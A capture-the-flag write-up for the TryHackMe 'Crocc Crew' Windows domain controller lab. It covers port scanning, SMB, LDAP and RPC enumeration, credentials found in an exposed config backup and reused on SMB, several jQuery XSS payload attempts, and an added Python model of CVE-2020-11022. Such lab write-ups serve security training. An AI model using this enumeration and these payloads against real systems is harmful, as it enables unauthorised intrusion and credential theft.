Crocc Crew
Recon to Foothold
Let’s begin as always with a scan, first masscan
rob:TryHackMe/ $ sudo masscan -p1-65535,U:1-65535 10.10.45.72 --rate=1000 -e tun0
[sudo] password for rob:
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-08-18 12:24:43 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 445/tcp on 10.10.45.72
Discovered open port 593/tcp on 10.10.45.72
Discovered open port 9389/tcp on 10.10.45.72
Discovered open port 464/tcp on 10.10.45.72
Discovered open port 49678/tcp on 10.10.45.72
Discovered open port 49669/tcp on 10.10.45.72
Discovered open port 49675/tcp on 10.10.45.72
Discovered open port 49711/tcp on 10.10.45.72
Discovered open port 636/tcp on 10.10.45.72
Discovered open port 49666/tcp on 10.10.45.72
Discovered open port 389/tcp on 10.10.45.72
Discovered open port 53/tcp on 10.10.45.72
Discovered open port 49674/tcp on 10.10.45.72
Discovered open port 3269/tcp on 10.10.45.72
Discovered open port 80/tcp on 10.10.45.72
Discovered open port 135/tcp on 10.10.45.72
Discovered open port 139/tcp on 10.10.45.72
Discovered open port 88/tcp on 10.10.45.72
Discovered open port 53/udp on 10.10.45.72
Discovered open port 3268/tcp on 10.10.45.72
Discovered open port 3389/tcp on 10.10.45.72
Ok, given the number and type of ports discovered this looks like a Windows machine. No UDP ports discovered apart from DNS (53) so for now at least we can ignore that
And now nmap for detail
rob:TryHackMe/ $ nmap -A -T4 -v -p53,80,88,135,139,389,445,464,593,636,3268,3269,3389,9389 10.10.45.72
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-18 13:36 BST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:36
Completed NSE at 13:36, 0.00s elapsed
Initiating NSE at 13:36
Completed NSE at 13:36, 0.00s elapsed
Initiating NSE at 13:36
Completed NSE at 13:36, 0.00s elapsed
Initiating Ping Scan at 13:36
Scanning 10.10.45.72 [2 ports]
Completed Ping Scan at 13:36, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:36
Completed Parallel DNS resolution of 1 host. at 13:36, 0.04s elapsed
Initiating Connect Scan at 13:36
Scanning 10.10.45.72 [14 ports]
Discovered open port 135/tcp on 10.10.45.72
Discovered open port 80/tcp on 10.10.45.72
Discovered open port 139/tcp on 10.10.45.72
Discovered open port 53/tcp on 10.10.45.72
Discovered open port 3389/tcp on 10.10.45.72
Discovered open port 445/tcp on 10.10.45.72
Discovered open port 389/tcp on 10.10.45.72
Discovered open port 464/tcp on 10.10.45.72
Discovered open port 9389/tcp on 10.10.45.72
Discovered open port 3269/tcp on 10.10.45.72
Discovered open port 88/tcp on 10.10.45.72
Discovered open port 636/tcp on 10.10.45.72
Discovered open port 593/tcp on 10.10.45.72
Discovered open port 3268/tcp on 10.10.45.72
Completed Connect Scan at 13:36, 0.02s elapsed (14 total ports)
Initiating Service scan at 13:36
Scanning 14 services on 10.10.45.72
Completed Service scan at 13:36, 6.64s elapsed (14 services on 1 host)
NSE: Script scanning 10.10.45.72.
Initiating NSE at 13:36
Completed NSE at 13:36, 40.09s elapsed
Initiating NSE at 13:36
Completed NSE at 13:36, 0.39s elapsed
Initiating NSE at 13:36
Completed NSE at 13:36, 0.00s elapsed
Nmap scan report for 10.10.45.72
Host is up (0.012s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-08-18 12:36:19Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: COOCTUS.CORP0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: COOCTUS.CORP0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: COOCTUS
| NetBIOS_Domain_Name: COOCTUS
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: COOCTUS.CORP
| DNS_Computer_Name: DC.COOCTUS.CORP
| Product_Version: 10.0.17763
|_ System_Time: 2021-08-18T12:36:20+00:00
| ssl-cert: Subject: commonName=DC.COOCTUS.CORP
| Issuer: commonName=DC.COOCTUS.CORP
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-06-07T02:37:18
| Not valid after: 2021-12-07T02:37:18
| MD5: 72be 3896 d880 1bc2 2455 1d55 33da 9300
|_SHA-1: bb1b c5bc 3aef ede9 3dc2 8b0d 0b00 c1d3 4371 19f4
|_ssl-date: 2021-08-18T12:37:00+00:00; +1s from scanner time.
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-08-18T12:36:25
|_ start_date: N/A
NSE: Script Post-scanning.
Initiating NSE at 13:36
Completed NSE at 13:36, 0.00s elapsed
Initiating NSE at 13:36
Completed NSE at 13:36, 0.00s elapsed
Initiating NSE at 13:36
Completed NSE at 13:36, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.75 seconds
Before we dig into the website and more complex ports let’s have a look at some of the simpler stuff, starting with SMB
rob:TryHackMe/ $ smbclient -L 10.10.45.72 -U "" -N
Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available
Ok then, it looks like we’ll require some creds before that is of any potential use
From our nmap scan we found a domain name cooctus.corp, let’s see if we can query DNS
rob:TryHackMe/ $ dig any cooctus.corp @10.10.45.72
; <<>> DiG 9.16.15-Debian <<>> any cooctus.corp @10.10.45.72
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 56434
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 2
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;cooctus.corp. IN ANY
;; ANSWER SECTION:
cooctus.corp. 600 IN A 10.10.10.237
cooctus.corp. 3600 IN NS dc.cooctus.corp.
cooctus.corp. 3600 IN SOA dc.cooctus.corp. hostmaster.cooctus.corp. 180 900 600 86400 3600
;; ADDITIONAL SECTION:
dc.cooctus.corp. 3600 IN A 10.10.45.72
;; Query time: 11 msec
;; SERVER: 10.10.45.72#53(10.10.45.72)
;; WHEN: Wed Aug 18 13:42:38 BST 2021
;; MSG SIZE rcvd: 137
Nothing particularly useful there, let’s try LDAP
rob:TryHackMe/ $ ldapsearch -x -h 10.10.45.72 -D '' -b "DC=<1_SUBDOMAIN>,DC=<TDL>"
# extended LDIF
#
# LDAPv3
# base <DC=<1_SUBDOMAIN>,DC=<TDL>> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4563
No, this is looking for credentials too! Let’s try another way
rob:CroccCrew/ $ ldapsearch -LLL -x -H ldap://dc.cooctus.corp -b '' -s base '(objectclass=*)'
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=COOCTUS,DC=CORP
ldapServiceName: COOCTUS.CORP:dc$@COOCTUS.CORP
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedControl: 1.2.840.113556.1.4.2330
supportedControl: 1.2.840.113556.1.4.2354
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=COOCTUS,DC=CORP
serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configurat
ion,DC=COOCTUS,DC=CORP
schemaNamingContext: CN=Schema,CN=Configuration,DC=COOCTUS,DC=CORP
namingContexts: DC=COOCTUS,DC=CORP
namingContexts: CN=Configuration,DC=COOCTUS,DC=CORP
namingContexts: CN=Schema,CN=Configuration,DC=COOCTUS,DC=CORP
namingContexts: DC=DomainDnsZones,DC=COOCTUS,DC=CORP
namingContexts: DC=ForestDnsZones,DC=COOCTUS,DC=CORP
isSynchronized: TRUE
highestCommittedUSN: 98342
dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN
=Sites,CN=Configuration,DC=COOCTUS,DC=CORP
dnsHostName: DC.COOCTUS.CORP
defaultNamingContext: DC=COOCTUS,DC=CORP
currentTime: 20210823235515.0Z
configurationNamingContext: CN=Configuration,DC=COOCTUS,DC=CORP
Ok, at a first glance there is nothing useful there for us. Some googling though finds us a new (to me at least) tool that looks very handy, ldapdomaindump
rob:CroccCrew/ $ ldapdomaindump -u 'Visitor' -p 'GuestLogin!' 10.10.145.144
[!] Username must include a domain, use: DOMAIN\username
rob:CroccCrew/ $ ldapdomaindump -u 'COOCTUS.CORP\Visitor' -p 'GuestLogin!' 10.10.145.144
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
This drops a number of files detailing computers, groups, policies, trusts, etc. An interesting one for us is the user table
There’s a lot of info here and nothing jumps out at me right now, it’s very readable though, must remember this one!
Trying to enumerate RPC gives us nothing without authentication either
rob:TryHackMe/ $ rpcinfo -p 10.10.45.72
10.10.45.72: RPC: Remote system error - Connection refused
And the same with rpcclient
rob:CroccCrew/ $ rpcclient -U "" -N dc.cooctus.corp
rpcclient $> querydispinfo
result was NT_STATUS_ACCESS_DENIED
If we try hunting through the commands available we do find one that returns an output
rob:~/ $ rpcclient -U "" -N 10.10.245.246
rpcclient $> enumprivs
found 35 privileges
SeCreateTokenPrivilege 0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege 0:3 (0x0:0x3)
SeLockMemoryPrivilege 0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege 0:5 (0x0:0x5)
SeMachineAccountPrivilege 0:6 (0x0:0x6)
SeTcbPrivilege 0:7 (0x0:0x7)
SeSecurityPrivilege 0:8 (0x0:0x8)
SeTakeOwnershipPrivilege 0:9 (0x0:0x9)
SeLoadDriverPrivilege 0:10 (0x0:0xa)
SeSystemProfilePrivilege 0:11 (0x0:0xb)
SeSystemtimePrivilege 0:12 (0x0:0xc)
SeProfileSingleProcessPrivilege 0:13 (0x0:0xd)
SeIncreaseBasePriorityPrivilege 0:14 (0x0:0xe)
SeCreatePagefilePrivilege 0:15 (0x0:0xf)
SeCreatePermanentPrivilege 0:16 (0x0:0x10)
SeBackupPrivilege 0:17 (0x0:0x11)
SeRestorePrivilege 0:18 (0x0:0x12)
SeShutdownPrivilege 0:19 (0x0:0x13)
SeDebugPrivilege 0:20 (0x0:0x14)
SeAuditPrivilege 0:21 (0x0:0x15)
SeSystemEnvironmentPrivilege 0:22 (0x0:0x16)
SeChangeNotifyPrivilege 0:23 (0x0:0x17)
SeRemoteShutdownPrivilege 0:24 (0x0:0x18)
SeUndockPrivilege 0:25 (0x0:0x19)
SeSyncAgentPrivilege 0:26 (0x0:0x1a)
SeEnableDelegationPrivilege 0:27 (0x0:0x1b)
SeManageVolumePrivilege 0:28 (0x0:0x1c)
SeImpersonatePrivilege 0:29 (0x0:0x1d)
SeCreateGlobalPrivilege 0:30 (0x0:0x1e)
SeTrustedCredManAccessPrivilege 0:31 (0x0:0x1f)
SeRelabelPrivilege 0:32 (0x0:0x20)
SeIncreaseWorkingSetPrivilege 0:33 (0x0:0x21)
SeTimeZonePrivilege 0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege 0:35 (0x0:0x23)
SeDelegateSessionUserImpersonatePrivilege 0:36 (0x0:0x24)
So this would suggest that whatever service account is running the RPC service has interesting privileges like SeImpersonatePrivilege. If we can get in as this account we may be able to escalate our privileges from there. That’s a big IF though! 😄
Let’s check out the web server on port 80 next
Ok, looking at the source shows us that this is a page made on webflow.io, there’s nothing site specific here. Let’s see if we can enumerate the web server then with a directory buster
rob:~/ $ gobuster dir --url http://10.10.245.246 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x html,php,asp,txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.245.246
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: html,php,asp,txt
[+] Timeout: 10s
===============================================================
2021/09/23 18:52:06 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 5342323]
/robots.txt (Status: 200) [Size: 70]
/Index.html (Status: 200) [Size: 5342323]
/backdoor.php (Status: 200) [Size: 529]
/Robots.txt (Status: 200) [Size: 70]
/index.html (Status: 200) [Size: 5342323]
===============================================================
2021/09/23 18:58:27 Finished
===============================================================
We found a robots.txt file that nmap didn’t show, let’s have a look at that
rob:CroccCrew/ $ curl dc.cooctus.corp/robots.txt
User-Agent: *
Disallow:
/robots.txt
/db-config.bak
/backdoor.php
Alright then, well there’s a couple of interesting files shown there, a backup of the database config perhaps and what could be a backdoor of some type, let’s look a little closer at these
rob:CroccCrew/ $ curl dc.cooctus.corp/db-config.bak
<?php
$servername = "db.cooctus.corp";
$username = "C00ctusAdm1n";
$password = "B4dt0th3b0n3";
// Create connection
$conn = new mysqli($servername, $username, $password);
// Check connection
if ($conn->connect_error) {
    die("Connection Failed: " . $conn->connect_error);
}
echo "Connected Successfully";
?>
Excellent, we appear to have found some credentials, C00ctusAdm1n:B4dt0th3b0n3, to a mysql database. Even if we can’t access that from outside the box, we may find some credential reuse elsewhere. Speaking of which, we have an open RDP port, let’s see if it works there
And no, nothing doing. Let’s check the other file
rob:CroccCrew/ $ curl dc.cooctus.corp/backdoor.php
<!DOCTYPE html>
<html>
<head>
<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
<script src="https://unpkg.com/jquery.terminal/js/jquery.terminal.min.js"></script>
<link rel="stylesheet" href="https://unpkg.com/jquery.terminal/css/jquery.terminal.min.css"/>
</head>
<body>
</body>
</html>
<script>
$('body').terminal({
hello: function(what) {
this.echo('Hello, ' + what +
'. Wellcome to this terminal.');
}
}, {
greetings: 'CroccCrew >:)'
});
</script>
Well, that does indeed look like a potential way in, let’s check it out in a browser
It takes a little trial and error and looking at the curl output above, but we manage to get a response from this hello function. This appears to be taking arbitrary input from the user and returning it (possibly unsanitized) in the response
We can mess with this a bit to see if we get any interesting responses
> hello
[Arity] Wrong number of arguments. Function 'hello' expects 1 got 0!
> Hello hello
Command 'Hello' Not Found!
> hello hello\';echo('here's something fun')#
Error: JSON.parse: unterminated string at line 1 column 9 of the JSON data
Ok that’s interesting, we have a JSON parser here. Not sure what we can make of it though! 😄 …and that is apparently nothing
jQuery Terminal Emulator is a plugin for creating command line interpreters in your applications. It can automatically call JSON-RPC service when a user types commands or you can provide your own function in which you can parse user commands
Some checking of the downloaded javascript files shows
- We are using jquery.terminal version 2.29.0 which was the very latest up until about 11 hours ago and has no known vulnerabilities according to the usual sources (cve.mitre.org, etc.)
- But we are using jquery-3.3.1.min.js which does have some known issues. This version was released 2018/1/20 (from the release history) and is a couple of major updates behind the current 3.6.0. Most interesting for us though is the 3.5.0 release for which the release notes read
Despite being a minor release, this update includes a breaking change that we had to make to fix a security issue (CVE-2020-11022)
If we check out this CVE we find something that sounds pretty useful in our situation
In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery’s DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code
Some googling finds that this CVE is one of a pair, we also have CVE-2020-11023
For CVE-2020-11022 we find a possible exploit in the exploit-db
And for CVE-2020-11023 we find some more
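How CVE-2020-11022 actually works, as an added example that is not code from the writeup or from jQuery itself: a Python port of the rxhtmlTag regex that jQuery 3.3.1's htmlPrefilter() applied to every string passed to .html()/.append(), the identity function 3.5.0 replaced it with, and a deliberately simplified parser showing why expanding `<style />` matters. The probe string is the one from the jQuery 3.5.0 release notes.

```python
"""Model of CVE-2020-11022: jQuery < 3.5.0 rewrote markup before the browser
parsed it. Added example, not code from the writeup or from jQuery; the regex
is a Python port of rxhtmlTag from jQuery 3.3.1 and the parser below models a
single HTML5 rule rather than a full browser."""
import re

# jQuery 3.3.1 rxhtmlTag, ported: any self-closing tag except the void elements
# listed in the negative lookahead gets expanded into an open/close pair.
RX_HTML_TAG = re.compile(
    r"<(?!area|br|col|embed|hr|img|input|link|meta|param)"
    r"(([a-z][^/\x00>\x20\t\r\n\f]*)[^>]*)/>",
    re.IGNORECASE,
)


def vulnerable_html_prefilter(html):
    """jQuery.htmlPrefilter() as shipped up to 3.4.1: <x/> becomes <x></x>."""
    return RX_HTML_TAG.sub(r"<\1></\2>", html)


def fixed_html_prefilter(html):
    """jQuery.htmlPrefilter() from 3.5.0 on: an identity function."""
    return html


TAG = re.compile(r"<(/?)([a-z][a-z0-9]*)[^>]*>", re.IGNORECASE)


def elements_created(html):
    """Names of the elements a browser would instantiate from `html`.

    Simplified HTML5 rule modelled here: <style> is a raw-text element, so
    everything up to the next </style> is text. A tag that stays inside that
    region never becomes an element, so its onerror handler never runs.
    """
    created = []
    pos = 0
    while True:
        m = TAG.search(html, pos)
        if m is None:
            return created
        closing, name = m.group(1) == "/", m.group(2).lower()
        pos = m.end()
        if closing:
            continue
        created.append(name)
        if name == "style":
            end = html.lower().find("</style>", pos)
            if end == -1:
                return created  # unterminated <style>: the rest is text
            pos = end + len("</style>")


# Probe from the jQuery 3.5.0 release notes: the <img> is swallowed by the
# raw-text <style> unless something turns "<style />" into "<style ></style>".
PROBE = "<style><style /><img src=x onerror=alert(1)>"


def compare(html=PROBE):
    """Return {version: elements created} for the vulnerable and fixed prefilters."""
    return {
        "jquery<3.5.0": elements_created(vulnerable_html_prefilter(html)),
        "jquery>=3.5.0": elements_created(fixed_html_prefilter(html)),
    }


if __name__ == "__main__":
    print(vulnerable_html_prefilter(PROBE))
    for version, created in compare().items():
        print(f"{version:14} -> {created}")
```

The takeaway for the page's setup is that the bug lives in the library's pre-processing, not in the browser, so upgrading jQuery to 3.5.0 or later (or never handing untrusted strings to DOM manipulation methods) removes it.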
However when we try these we run into that argument number checker we saw earlier, the spaces are our enemies!
> hello <option><style></option></select><img src=x onerror=alert(1)></style>
[Arity] Wrong number of arguments. Function 'hello' expects 1 got 3!
And if we try to replace spaces with + or %20 we don’t get any further
> hello <option><style></option></select><img+src=x+onerror=alert(1)></style>
Hello, <option><style></option></select><img+src=x+onerror=alert(1)></style>. Wellcome to this terminal.
> hello <option><style></option></select><img%20src=x%20onerror=alert(1)></style>
Hello, <option><style></option></select><img%20src=x%20onerror=alert(1)></style>. Wellcome to this terminal.
But on a second thought, since those methods are typically good for URL encoding, perhaps we’d be better off trying to use
> hello <option><style></option></select><img src=x onerror=alert(1)></style>
^
However finishing this with a ; converts automagically back to a space!
> hello <option><style></option></select><img src=x onerror=alert(1)></style>
We seem to get a little progress (maybe… at least a different response!) with escaping the spaces
hello > hello <option><style></option></select><img\ src=x\ onerror=alert(1)></style>
Hello, <option><style></option></select><img\ src=x onerror=alert(1)></style>. Wellcome to this terminal.
> hello <style><style\ /><img\ src=x\ onerror=alert(1)>
Hello, <style><style /><img src=x onerror=alert(1)>. Wellcome to this terminal.
> hello <img\ alt="<x"\ title="/><img\ src=x\ onerror=alert(1)>">
Error: JSON.parse: bad escaped character at line 1 column 7 of the JSON data
So we can see that in at least the first two POCs the string is being accepted, but it appears that it is not being interpreted, simply returned
Looking a little closer at the first (or second) output though we can see something odd
> hello <option><style></option></select><img\ src=x\ onerror=alert(1)></style>
Hello, <option><style></option></select><img\ src=x onerror=alert(1)></style>. Wellcome to this terminal.
For the space after src=x the backslash is gone and the space renders correctly. However for the space after img we can still see the backslash
At this point we’re grinding to a halt with this approach, let’s see if we can find another avenue of attack
On a hint from discord that remmina is not the best RDP client to use, let’s see what we get if we use an alternative, rdesktop
Ok, that does make a difference. Some googling suggests that
your RDP client must be old enough to not support network level authentication (i.e. from WinXP or before) or you have to connect via a .rdp file that contains the option enablecredsspsupport:i:0
We’re not using a .rdp file, so I guess it is really old!
We find another possible set of user credentials we can try, Visitor:GuestLogin!, but they won’t work for RDP
Let’s try them elsewhere then
rob:~/ $ smbclient -L 10.10.245.246 -U 'Visitor'
Enter WORKGROUP\Visitor's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Home Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
Excellent, we can access an SMB share with these credentials, let’s see what’s in there
rob:~/ $ smbclient //10.10.245.246/Home -U 'Visitor'
Enter WORKGROUP\Visitor's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Jun 8 20:42:53 2021
.. D 0 Tue Jun 8 20:42:53 2021
user.txt A 17 Tue Jun 8 04:14:25 2021
15587583 blocks of size 4096. 11417631 blocks available
smb: \> get user.txt
getting file \user.txt of size 17 as user.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> !cat user.txt
THM{REDACTED}
And we’ve got our first flag, #1: THM{REDACTED}
C00ctusAdm1n:B4dt0th3b0n3
NB: we could also have used crackmapexec to test these credentials
rob:CroccCrew/ $ crackmapexec smb 10.10.145.144 -u 'Visitor' -p 'GuestLogin!'
SMB 10.10.145.144 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:COOCTUS.CORP) (signing:True) (SMBv1:False)
SMB 10.10.145.144 445 DC [+] COOCTUS.CORP\Visitor:GuestLogin!
From first creds to privileged RCE
So now, with a set of working SMB credentials, we have a few more options. We want to find usernames so let’s first try enum4linux
rob:~/ $ enum4linux -u 'Visitor' -p 'GuestLogin!' -U 10.10.245.246
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Sep 23 19:18:14 2021
==========================
| Target Information |
==========================
Target ........... 10.10.245.246
RID Range ........ 500-550,1000-1050
Username ......... 'Visitor'
Password ......... 'GuestLogin!'
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=====================================================
| Enumerating Workgroup/Domain on 10.10.245.246 |
=====================================================
[E] Can't find workgroup/domain
======================================
| Session Check on 10.10.245.246 |
======================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server 10.10.245.246 allows sessions using username 'Visitor', password 'GuestLogin!'
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name:
============================================
| Getting domain SID for 10.10.245.246 |
============================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: COOCTUS
Domain Sid: S-1-5-21-2062199590-3607821280-2073525473
[+] Host is part of a domain (not a workgroup)
==============================
| Users on 10.10.245.246 |
==============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0xfda RID: 0x461 acb: 0x00000210 Account: admCroccCrew Name: admCroccCrew Desc: (null)
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0xfe4 RID: 0x46b acb: 0x00000210 Account: Ben Name: Ben Desc: (null)
index: 0xfdd RID: 0x464 acb: 0x00000210 Account: cryillic Name: cryillic Desc: (null)
index: 0xfe5 RID: 0x46c acb: 0x00000210 Account: David Name: David Desc: (null)
index: 0xfe3 RID: 0x46a acb: 0x00000210 Account: evan Name: evan Desc: (null)
index: 0xfdb RID: 0x462 acb: 0x00000210 Account: Fawaz Name: Fawaz Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xfd9 RID: 0x460 acb: 0x00000210 Account: Howard Name: Howard Desc: (null)
index: 0xfd5 RID: 0x45c acb: 0x00000210 Account: Jeff Name: Jeff Desc: (null)
index: 0xfe1 RID: 0x468 acb: 0x00000210 Account: jon Name: jon Desc: (null)
index: 0xfdc RID: 0x463 acb: 0x00000210 Account: karen Name: karen Desc: (null)
index: 0xfe0 RID: 0x467 acb: 0x00000210 Account: kevin Name: kevin Desc: (null)
index: 0xf0f RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0xfd4 RID: 0x45b acb: 0x00020010 Account: mark Name: Mark Desc: (null)
index: 0xfdf RID: 0x466 acb: 0x00000210 Account: pars Name: paradox Desc: (null)
index: 0xfe8 RID: 0x46e acb: 0x00040210 Account: password-reset Name: reset Desc: (null)
index: 0xfd6 RID: 0x45d acb: 0x00000210 Account: Spooks Name: Spooks Desc: (null)
index: 0xfd8 RID: 0x45f acb: 0x00000210 Account: Steve Name: Steve Desc: (null)
index: 0xfe2 RID: 0x469 acb: 0x00000210 Account: Varg Name: varg Desc: (null)
index: 0xfb8 RID: 0x455 acb: 0x00000210 Account: Visitor Name: Cooctus Guest Desc: (null)
index: 0xfde RID: 0x465 acb: 0x00000210 Account: yumeko Name: yumeko Desc: (null)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[Visitor] rid:[0x455]
user:[mark] rid:[0x45b]
user:[Jeff] rid:[0x45c]
user:[Spooks] rid:[0x45d]
user:[Steve] rid:[0x45f]
user:[Howard] rid:[0x460]
user:[admCroccCrew] rid:[0x461]
user:[Fawaz] rid:[0x462]
user:[karen] rid:[0x463]
user:[cryillic] rid:[0x464]
user:[yumeko] rid:[0x465]
user:[pars] rid:[0x466]
user:[kevin] rid:[0x467]
user:[jon] rid:[0x468]
user:[Varg] rid:[0x469]
user:[evan] rid:[0x46a]
user:[Ben] rid:[0x46b]
user:[David] rid:[0x46c]
user:[password-reset] rid:[0x46e]
enum4linux complete on Thu Sep 23 19:18:25 2021
